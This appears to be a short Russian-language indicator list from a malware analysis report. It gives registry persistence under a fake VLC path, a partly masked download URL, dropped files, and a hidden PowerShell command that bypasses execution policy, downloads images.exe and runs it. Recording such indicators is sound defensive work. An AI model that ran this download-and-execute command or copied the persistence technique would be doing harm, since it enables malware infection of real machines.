Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'vlc' = '"%APPDATA%\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"'
- http://13.##.228.87/excel/images.exe как %appdata%\images.exe
- images.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\images.exe
- %APPDATA%\microsoft\windows\start menu\programs\videolan\vlc.exe
- http://13.##.228.87/excel/images.exe
- '%APPDATA%\images.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.##.228.87/excel/images.exe','%APPDATA%\images.exe');Start-Process '...' (со скрытым окном)